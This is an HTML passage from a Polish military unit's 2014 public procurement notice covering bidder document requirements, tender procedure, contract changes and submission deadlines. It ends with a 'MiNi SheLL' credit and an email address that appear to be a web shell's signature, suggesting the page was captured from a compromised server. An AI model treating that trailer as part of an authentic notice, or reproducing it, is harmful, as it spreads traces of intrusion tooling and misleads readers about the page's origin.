w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Formularz ofertowy-Formularz cenowy-Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie. - W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy - W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu zgodnie z art. 23 ustawy Pzp -W przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne w oryginale zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem § 9 umowy.
 - Zamawiający zastrzega możliwość zmiany wysokości zobowiązania w przypadku zmiany stawki podatku od towarów i usług w 2015 r./ 2016 r.
 - Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl,www.24wog.wp.mil.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4352 
ul. Nowowiejska 20
11-500 Giżycko
kancelaria 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 09:00, miejsce: Jednostka Wojskowa 4352 
ul. Nowowiejska 20
11-500 Giżycko
kancelaria 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com